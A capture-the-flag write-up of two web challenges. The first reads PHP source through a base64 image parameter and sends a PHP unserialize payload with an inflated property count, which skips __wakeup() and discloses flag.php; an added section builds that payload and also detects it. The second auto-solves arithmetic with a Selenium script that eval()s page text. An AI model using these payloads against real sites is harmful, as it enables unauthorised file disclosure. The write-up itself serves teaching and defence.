Two CTF Web topics

1. easyphp

1.1. Title Description

The first challenge shows a page whose only content is an image that does not display.

Viewing the source reveals a single line:

<img src="show.php?img=aGludC5qcGc=" width="100%"/>

Opening the image link from the source leads to another page.

The value of the img parameter looks like base64; decoding it confirms this and gives hint.jpg.

Replacing img with the base64 encoding of flag.jpg and flag.php returned nothing useful.

Requesting index.php or show.php directly shows nothing of interest either, so the next idea was to use the img parameter to read the source of those two PHP files.

index.php base64-encodes to aW5kZXgucGhw

show.php base64-encodes to c2hvdy5waHA=

Both requests returned the source code, reproduced below.

index.php

<?php 
  require_once('hint.php');
  $x = new hint();
  isset($_GET['class']) && $g = $_GET['class'];
  if (!empty($g)) {
    $x = unserialize($g);
    echo $x;
  }
?>
<img src="show.php?img=aGludC5qcGc=" width="100%"/>

show.php

<?php
  $f = $_GET['img'];
  if (!empty($f)) {
    $f = base64_decode($f);
    if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
    && stripos($f,'flag')===FALSE) {
      readfile($f);
    } else {
      echo "File not found!";
    }
  }
?>

index.php references hint.php, which can be read the same way:

hint.php base64-encodes to aGludC5waHA=

<?php
  error_reporting(0);
  //flag is in flag.php
  class hint{
    public $file='';
    function __destruct(){
      if(!empty($this->file)) {
        if(strchr($this->file,"\\")===false && strchr($this->file,'/')===false)
          show_source(dirname(__FILE__).'/'.$this->file);
        else
          die('Wrong filename.');
      }
    }
    function __wakeup(){ $this->file='index.php'; }
    public function __toString(){ return ''; }
  }
?>

1.2. Code audit

hint.php tells us the flag is in flag.php, so that is the file we need to read.

show.php filters the file name with stripos, so flag.php cannot be read through show.php.

hint.php defines a hint class whose __destruct() calls show_source(dirname(__FILE__).'/'.$this->file), which can display the source of a PHP file.

index.php passes the class parameter to unserialize() to build a hint object, so we can try to read flag.php through deserialization.

1.3. Payload construction

Copy hint.php locally, append the following lines, and run it to obtain the serialized string:

$x=new hint();
$x->file="flag.php";
echo serialize($x);

O:4:"hint":1:{s:4:"file";s:8:"flag.php";}

For the meaning of the serialized string format see: https://www.cnblogs.com/dogecheng/p/11652022.html

According to the source of index.php, passing this string as the class parameter should be enough, but it did not return the flag.

Looking it up online: after unserialize(), the __wakeup() method is also called, which resets file to index.php, so it is not flag.php that gets read.

https://blog.csdn.net/bylfsj/article/details/101385852

We need to bypass __wakeup(), and the bypass is simple: when the property count declared in the serialized string is larger than the actual number of properties, __wakeup() is not executed.

Our original serialized string:

O:4:"hint":1:{s:4:"file";s:8:"flag.php";}

We just need to change that number to something larger:

O:4:"hint":2:{s:4:"file";s:8:"flag.php";}

Resubmitting the request with this string returns the flag.
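As an added example (not part of the original writeup), the following Python builds the serialized hint object from 1.3 and the base64 img parameter from 1.1, and, from the defender's side, checks a serialized PHP object for the declared-vs-actual property count mismatch that the bypass relies on. The mismatch only skipped __wakeup() on PHP versions before 5.6.25 and 7.0.10; the serializer and parser here are my simplification and handle only flat objects with scalar properties.

```python
import base64
import re

def img_param(filename):
    """Encode a file name the way show.php expects it in ?img= (plain base64)."""
    return base64.b64encode(filename.encode()).decode()

def php_serialize_object(class_name, props):
    """Serialize a flat object with ASCII string properties in PHP's format (simplified)."""
    body = "".join(f's:{len(k)}:"{k}";s:{len(v)}:"{v}";' for k, v in props.items())
    return f'O:{len(class_name)}:"{class_name}":{len(props)}:{{{body}}}'

def _parse_values(body):
    """Walk a property list and return its scalar tokens: s, i, b and N only."""
    vals, pos = [], 0
    while pos < len(body):
        t = body[pos]
        if t == "N":                          # N;
            vals.append(None)
            pos += 2
        elif t in "ib":                       # i:123;  b:1;
            end = body.index(";", pos)
            raw = int(body[pos + 2:end])
            vals.append(bool(raw) if t == "b" else raw)
            pos = end + 1
        elif t == "s":                        # s:8:"flag.php";  (length is in bytes)
            colon = body.index(":", pos + 2)
            n = int(body[pos + 2:colon])
            start = colon + 2                 # skip :"
            vals.append(body[start:start + n])
            pos = start + n + 2               # skip ";
        else:
            raise ValueError(f"unsupported token {t!r} at offset {pos}")
    return vals

def declared_vs_actual(serialized):
    """Return (declared property count, actual property count) of a serialized PHP object."""
    m = re.fullmatch(r'O:(\d+):"([^"]*)":(\d+):\{(.*)\}', serialized, re.S)
    if not m or int(m.group(1)) != len(m.group(2)):
        raise ValueError("not a serialized PHP object")
    vals = _parse_values(m.group(4))
    if len(vals) % 2:
        raise ValueError("property list is not key/value pairs")
    return int(m.group(3)), len(vals) // 2

def suspicious_property_count(serialized):
    """True when the declared count exceeds the real one: on PHP < 5.6.25 / 7.0.10 this
    skipped __wakeup(), which is exactly what the modified string in 1.3 relies on."""
    declared, actual = declared_vs_actual(serialized)
    return declared > actual
```

A web application firewall or input validator that rejects a serialized object whenever suspicious_property_count() is true catches this bypass regardless of the class name used.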


2. calculate

2.1. Title Description

The challenge presents a series of arithmetic questions.

We have to answer 10 of them. Testing showed that each question must be answered correctly within three seconds; a wrong answer or a timeout resets the count of correct answers to zero. There also has to be an interval of 1 second between answers.

The page source is below; the expression is split across several divs:

<h1>calculate</h1>

<p>Answer the questions for 10 times and you can get flag.</p>
<p> You Have answered 0 questions;</p>

<form action="" method="post">
<div style="display:inline;color:#499E86">6</div><div style="display:inline;color:#BC2109">1</div><div style="display:inline;color:#E20AAD">5</div><div style="display:inline;color:#AE2893">+</div><div style="display:inline;color:#A3A7DA">9</div><div style="display:inline;color:#72311C">9</div><div style="display:inline;color:#7D99E9">7</div><div style="display:inline;color:#3DB475">+</div><div style="display:inline;color:#2144AE">6</div><div style="display:inline;color:#8523C0">1</div><div style="display:inline;color:#D42154">5</div><div style="display:inline;color:#DD166F">*</div><div style="display:inline;color:#0ADBF4">9</div><div style="display:inline;color:#116660">9</div><div style="display:inline;color:#4F6723">7</div><div style="display:inline;color:#7F7A0D">=</div>
<input type="text" name="ans">
<input type="submit" value="send!">
</form>

2.2. Scripting

I first tried this with the Python requests library without success; switching to selenium worked. The code is as follows:

from selenium import webdriver
from bs4 import BeautifulSoup
import time

driver = webdriver.Firefox()
driver.get("http://****:13002/")

def submit(driver):
    # fetch the page source
    source = driver.page_source
    # parse it with BeautifulSoup
    soup = BeautifulSoup(source, "lxml")
    all_div = soup.find_all(name="div")

    # rebuild the expression: every div holds one character
    s = ""
    for d in all_div:
        s = s + d.contents[0]
    # drop the trailing equals sign
    s = s[:-1]
    print(s)

    # calculate (eval runs whatever text the page supplies)
    res = eval(s)

    # fill in the answer
    element = driver.find_element_by_name("ans")
    element.send_keys(res)

    # wait 1.1 seconds (answers are only accepted after a 1 second interval)
    time.sleep(1.1)

    # submit the answer
    driver.find_element_by_xpath("/html/body/form/input[2]").click()
    print("click")

for i in range(10):
    submit(driver)

After answering 10 questions the flag appears on the page.


Source: https://www.cnblogs.com/dogecheng/p/11729653.html